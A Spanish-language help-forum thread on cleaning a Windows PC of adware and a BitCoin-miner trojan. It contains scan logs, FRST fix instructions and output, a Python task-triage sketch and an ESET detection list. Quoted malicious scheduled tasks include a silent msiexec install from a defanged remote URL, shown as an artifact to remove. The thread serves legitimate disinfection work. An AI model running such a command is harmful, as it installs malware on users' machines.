Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{A87F6214-B479-4A28-BD0C-028D27A1F05C}, Sin acciones por parte del usuario, [14191], [555894],1.0.7428

Valor del registro: 0
(No hay elementos maliciosos detectados)

Datos del registro: 0
(No hay elementos maliciosos detectados)

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 0
(No hay elementos maliciosos detectados)

Archivo: 11
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}, Sin acciones por parte del usuario, [6036], [571190],1.0.7428
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{DA905C87-7E94-C064-9156-0FA60FF7E39B}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.StartPage.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{AD1685E2-7536-7AF3-A95D-3F7867585C73}, Sin acciones por parte del usuario, [14191], [555894],1.0.7428

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)

#15

This latest Malwarebytes scan you posted says it didn't remove anything: “sin acciones por el usuario” (no action by the user).

Did you select the items and click to send them to quarantine??

Check whether those items are in quarantine, and if not, repeat the scan.


OK… now follow these steps. VERY important ~ make a backup of the registry:

  • To do so, download Delfix to your desktop.

  • Double-click to run it. (If you use Windows Vista/7/8 or 10, right-click and select "Run as Administrator.")

  • Careful: now tick/select only the "Create registry backup" box, NOT the others.

  • Click Run.

The report (DelFix.txt) will open; save it in case it is needed and close the tool.


On the computer, with all other programs closed:

Start >>> Run >>> type notepad.exe.

Now copy and paste the following into Notepad:


Start
CreateRestorePoint:
CloseProcesses:

IFEO\ccd-uninst.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecdtray.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\databasecompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtagent.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtlauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\excel.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\fahconsole.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\helplauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\nitropdf.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\powerpnt.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\regclonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\spreadsheetcompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winword.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winzip64.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzbgtools.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzpreloader.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzupdatenotifier.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
U3 ai14l3mj; C:\Windows\System32\Drivers\ai14l3mj.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U0 aswVmm; no ImagePath
S2 npf; \??\C:\Windows\system32\drivers\npf.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2018-10-04 11:44 - 2018-10-08 10:48 - 000003726 _____ C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}
2018-10-04 11:44 - 2018-10-05 09:13 - 000003436 _____ C:\Windows\System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B}
2018-10-04 11:44 - 2018-10-04 11:44 - 000003562 _____ C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}
Task: {5074E7C9-8B67-498E-B5FA-3D6C2BCC441E} - System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6} => "msiexec.exe" -i hxxp://inthemel.info/zbbqikhhxcuh.ciy -q
Task: {54C284F1-9B86-429C-9B70-433F38B5D831} - \SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc -> No File <==== ATTENTION
Task: {A87F6214-B479-4A28-BD0C-028D27A1F05C} - System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73} => "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" hxxp://jooring.net/cl/?guid=y59kcxeaks8jrwj72y9g2sxsddnfs11g&prid=1&pid=4_1324_0
Task: {F4E00397-2025-4A47-B1A6-8FE93D4F1AED} - \SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5 -> No File <==== ATTENTION
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
AlternateDataStreams: C:\Windows:nlsPreferences [386]


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
END

Save it under the name fixlist.txt on the desktop <<< This is very important.

Note: It is important that the tool Frst.exe and fixlist.txt are in the same location (the desktop), otherwise it will not work.

  • Now use this Windows FAQ, "How to start Windows in Safe Mode?", to work from that Windows mode.

  • Run Frst.exe.

  • Press the Fix button and wait for it to finish.

  • The tool will save the report on your desktop (Fixlog.txt).

Paste it in your next reply, along with this other scan, run as indicated, and paste that log as well, commenting on how the problem is going:


#16

Fixlog:

Fix result of Farbar Recovery Scan Tool (x64) Version: 10.10.2018
Ran by Dango (19-10-2018 13:33:53) Run:1
Running from C:\Users\Dango\Desktop
Loaded Profiles: Dango (Available Profiles: Dango)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:

IFEO\ccd-uninst.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecdtray.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\databasecompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtagent.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtlauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\excel.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\fahconsole.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\helplauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\nitropdf.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\powerpnt.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\regclonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\spreadsheetcompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winword.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winzip64.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzbgtools.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzpreloader.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzupdatenotifier.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
U3 ai14l3mj; C:\Windows\System32\Drivers\ai14l3mj.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U0 aswVmm; no ImagePath
S2 npf; \??\C:\Windows\system32\drivers\npf.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2018-10-04 11:44 - 2018-10-08 10:48 - 000003726 _____ C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}
2018-10-04 11:44 - 2018-10-05 09:13 - 000003436 _____ C:\Windows\System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B}
2018-10-04 11:44 - 2018-10-04 11:44 - 000003562 _____ C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}
Task: {5074E7C9-8B67-498E-B5FA-3D6C2BCC441E} - System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6} => "msiexec.exe" -i hxxp://inthemel.info/zbbqikhhxcuh.ciy -q
Task: {54C284F1-9B86-429C-9B70-433F38B5D831} - \SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc -> No File <==== ATTENTION
Task: {A87F6214-B479-4A28-BD0C-028D27A1F05C} - System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73} => "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" hxxp://jooring.net/cl/?guid=y59kcxeaks8jrwj72y9g2sxsddnfs11g&prid=1&pid=4_1324_0
Task: {F4E00397-2025-4A47-B1A6-8FE93D4F1AED} - \SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5 -> No File <==== ATTENTION
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
AlternateDataStreams: C:\Windows:nlsPreferences [386]


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
END
*****************

Error: Restore point can only be created in normal mode.
Processes closed successfully.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ccd-uninst.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\clonecd.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\clonecdtray.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\databasecompare.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dtagent.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dtlauncher.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\excel.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fahconsole.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\helplauncher.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nitropdf.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\powerpnt.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\regclonecd.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spreadsheetcompare.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\winword.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\winzip64.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wzbgtools.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wzpreloader.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wzupdatenotifier.exe => removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\Software\Classes\PROTOCOLS\Handler\WSWSVCUchrome => removed successfully
ai14l3mj => service not found.
HKLM\System\CurrentControlSet\Services\aswVmm => removed successfully
aswVmm => service removed successfully
HKLM\System\CurrentControlSet\Services\npf => removed successfully
npf => service removed successfully
HKLM\System\CurrentControlSet\Services\taphss6 => removed successfully
taphss6 => service removed successfully
HKLM\System\CurrentControlSet\Services\VGPU => removed successfully
VGPU => service removed successfully
"C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}" => not found
"C:\Windows\System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B}" => not found
"C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5074E7C9-8B67-498E-B5FA-3D6C2BCC441E}" => not found
"C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{54C284F1-9B86-429C-9B70-433F38B5D831}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{54C284F1-9B86-429C-9B70-433F38B5D831}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A87F6214-B479-4A28-BD0C-028D27A1F05C}" => not found
"C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{AD1685E2-7536-7AF3-A95D-3F7867585C73}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F4E00397-2025-4A47-B1A6-8FE93D4F1AED}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F4E00397-2025-4A47-B1A6-8FE93D4F1AED}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5" => removed successfully
C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk => moved successfully
C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk => moved successfully
C:\Windows => ":nlsPreferences" ADS removed successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully
"HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
"HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully


========= End of RemoveProxy: =========


========= netsh winsock reset =========


El catálogo Winsock se restableció correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= End of CMD: =========


========= ipconfig /renew =========


Configuración IP de Windows


========= End of CMD: =========


========= ipconfig /flushdns =========


Configuración IP de Windows

No se puede vaciar la caché de resolución de DNS: Error de una función durante la ejecución.


========= End of CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to connect to BITS - 0x8007042c
No se puede iniciar el servicio o grupo de dependencia.



========= End of CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 4159390 B
Java, Flash, Steam htmlcache => 178343613 B
Windows/system/drivers => 8424110 B
Edge => 0 B
Chrome => 0 B
Firefox => 100194400 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 88010 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58558406 B
systemprofile32 => 117073 B
LocalService => 66228 B
NetworkService => 66228 B
Dango => 8276936 B
DefaultAppPool => 88010 B

RecycleBin => 0 B
EmptyTemp: => 341.8 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 13:34:14 ====
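
A triage sketch for the `Task:` lines in the fixlist above, added here as an example (it is not part of the original thread and is not FRST's own logic): it flags scheduled tasks whose action silently installs a remote MSI or opens a URL in a browser, the persistence behind the recurring tabs. The function name `triage` and the reason labels are this example's own.

```python
import re
from dataclasses import dataclass, field

# The four "Task:" lines from the fixlist above, copied as posted (URLs stay defanged).
SAMPLE_FRST_LINES = r'''
Task: {5074E7C9-8B67-498E-B5FA-3D6C2BCC441E} - System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6} => "msiexec.exe" -i hxxp://inthemel.info/zbbqikhhxcuh.ciy -q
Task: {54C284F1-9B86-429C-9B70-433F38B5D831} - \SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc -> No File <==== ATTENTION
Task: {A87F6214-B479-4A28-BD0C-028D27A1F05C} - System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73} => "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" hxxp://jooring.net/cl/?guid=y59kcxeaks8jrwj72y9g2sxsddnfs11g&prid=1&pid=4_1324_0
Task: {F4E00397-2025-4A47-B1A6-8FE93D4F1AED} - \SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5 -> No File <==== ATTENTION
'''

GUID = r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}'
# "Task: {id} - <task name/path> => <action>"  or  "... -> No File"
TASK_RE = re.compile(r'^Task: (' + GUID + r') - (.+?) (=>|->) (.*)$')
URL_RE = re.compile(r'\bh(?:tt|xx)ps?://\S+', re.I)        # live or defanged URL
GUID_NAME_RE = re.compile(r'(?:^|\\)' + GUID + r'$')       # task named only by a GUID
BROWSER_RE = re.compile(r'(?:firefox|chrome|iexplore|msedge|opera)\.exe', re.I)
MSIEXEC_RE = re.compile(r'\bmsiexec(?:\.exe)?\b', re.I)
QUIET_RE = re.compile(r'(?:^|\s)[-/]q\w*(?=\s|$)', re.I)   # -q, /q, /qn, /quiet


@dataclass
class TaskFinding:
    task_id: str
    name: str
    action: str
    reasons: list = field(default_factory=list)


def triage(log_text):
    """Parse FRST 'Task:' lines and attach a reason label per suspicious trait."""
    findings = []
    for raw in log_text.splitlines():
        m = TASK_RE.match(raw.strip())
        if not m:
            continue                      # not a Task: line
        task_id, name, _arrow, action = m.groups()
        f = TaskFinding(task_id, name, action)
        has_url = URL_RE.search(action) is not None

        if action.startswith('No File'):
            # Leftover registration whose target is gone: clutter, not persistence.
            f.reasons.append('orphaned-no-file')
        if GUID_NAME_RE.search(name):
            # Random GUID as the task name: common for adware-created tasks.
            f.reasons.append('guid-named-task')
        if has_url and MSIEXEC_RE.search(action):
            # msiexec accepts a URL as the package source.
            f.reasons.append('msiexec-remote-package')
            if QUIET_RE.search(action):
                f.reasons.append('silent-install')
        elif has_url and BROWSER_RE.search(action):
            # The task does nothing but open a page: the recurring tab.
            f.reasons.append('browser-opens-url')
        findings.append(f)
    return findings


def persistence_tasks(findings):
    """Tasks that re-run something from the network, as opposed to orphans."""
    keep = {'msiexec-remote-package', 'browser-opens-url'}
    return [f for f in findings if keep & set(f.reasons)]


if __name__ == '__main__':
    for f in triage(SAMPLE_FRST_LINES):
        print(f.task_id, ', '.join(f.reasons) or 'no flags')
```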

#17

ESET log:

|File|Detection|Action|
|---|---|---|
|C:\AdwCleaner\Quarantine\v1\20181004.220428\3\RPEng\F82BFB4843174DA29E8A920DC0B702A4\WcInstaller.exe#2BA4444535BF50BB|una variante de MSIL/WebCompanion.C aplicación potencialmente no deseada|desinfectado por eliminación|
|C:\Program Files (x86)\Cheat Engine 6.3\cheatengine-i386.exe|una variante de Win32/HackTool.CheatEngine.AB aplicación potencialmente no segura|desinfectado por eliminación|
|C:\Program Files (x86)\PDFCreator\Toolbar\pdfforge Toolbar_setup.exe|Win32/Toolbar.Widgi aplicación potencialmente no deseada|desinfectado por eliminación|
|C:\Users\Dango\Desktop\01 Rutine Malwarebytes\ccsetup543.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|C:\Users\Dango\Desktop\Nueva carpeta\ccsetup547.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|C:\Windows\AutoKMS\AutoKMS.exe|una variante de MSIL/HackKMS.H aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Descargas\Compressed\AgfEII-TRR-RLD-PGME\Age.of.Empires.II.HD.The.Rise.of.the.Rajas-RELOADED\rld-aoe2hdrajas-compucalitv.iso|una variante de Win32/HackTool.Crack.EN aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Descargas\Compressed\VOOBLY\aoe2+fe\Age of Empires II\AoE2Wide\Process.exe|Win32/PrcView aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Descargas\Programs\FVC4.1.9.4\Freemake Video Converter 4.1.9.4\Freemake Video Converter 4.1.9.4.exe|una variante de Win32/Freemake.A aplicación potencialmente no deseada,una variante de Win32/OpenCandy.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Descargas\Programs\Recuva.1.52.1086.Pro.LHG\Recuva.1.52.1086.Professional\rcsetup152.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Android\Games Android\Deemo\D33M0 Full v2.0.0 [Apkingdom.com].apk|una variante de Android/Secapk.E aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Android\Games Android\Zenonia 5 +Internet\zenonia-5-1-1-8-es-en-fr-de-it-android.apk|una variante de Android/Nqshield.A aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Antivirus\Kaspersky\Keys Kaspersky\KAV - KIS KEYS August  16, 2014.rar|Win32/HackTool.Kiser.ZV troyano|eliminado|
|E:\Data\Documentos\Programas\Autodesk\Autodesk Inventor Pro 2015 x64\Autodesk Inventor Pro 2015 x64.iso|una variante de Win32/Keygen.HA aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\CCleaner\CCleaner 5\ccsetup_514.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\CCleaner\CCleaner Professional v5.14.5493 Final\CCleaner Professional v5.14.5493 Final.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\CD Booteable\UltraISO + Boot WinXP by NytroXFoX.rar|una variante de Win32/HackTool.Patcher.CL aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Converter\FreeMake Video Converter\FreemakeVideoConverterSetup.exe|una variante de Win32/Freemake.A aplicación potencialmente no deseada,una variante de Win32/OpenCandy.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Desfragmentadores\Defraggler\Defraggler 2.20\dfsetup220.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\DirectX\32bit_Advanced_v456.exe|Win32/WebDevAZ.C aplicación potencialmente no deseada|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Diseño y Animacion\Corel Painter\Corel Painter 12\Descargapremium69.com_C.P.12_Ke_bY_potozilandia_Anuncialo.info.rar|una variante de Win32/Keygen.AU aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Drivers\DLL Faltantes\Dll File Fixer\disable_activation.cmd|BAT/HostsChanger.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Drivers\Driver Genius Professional\Driver Genius Professional 12\crack drivers\DriverGenius.exe|Win32/DriverGenius.A aplicación potencialmente no deseada|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Edicion Video\Freemake Video Converter\FreemakeVideoConverter_4.1.4.6.exe|una variante de Win32/Freemake.A aplicación potencialmente no deseada,una variante de Win32/OpenCandy.A aplicación potencialmente no segura|desinfectado por eliminación|
